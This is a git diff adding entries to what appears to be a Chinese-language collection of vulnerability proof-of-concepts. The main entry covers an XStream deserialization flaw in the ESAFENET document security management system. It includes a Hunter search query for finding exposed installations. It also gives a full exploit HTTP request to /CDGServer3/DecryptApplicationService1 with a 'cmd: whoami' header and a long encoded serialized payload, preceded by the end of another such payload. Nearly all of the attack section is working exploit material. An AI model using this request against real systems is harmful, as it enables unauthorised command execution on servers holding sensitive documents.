NHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFE
JKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLP
LJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCL
BIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIA
CBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJE
ENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606939826-c9da39b5-0564-4cc3-ab95-c276b4ec133b.png](./img/Fv6jdjorzsAlhpvz/1706606939826-c9da39b5-0564-4cc3-ab95-c276b4ec133b-738059.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zgeegd6ivf61zsv6> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..9e8c3db --- /dev/null 
+++ b/亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统DecryptApplicationService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/IibT0D1-9oe0dU9a/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-089149.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/DecryptApplicationService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMB
FEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMO
AJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDE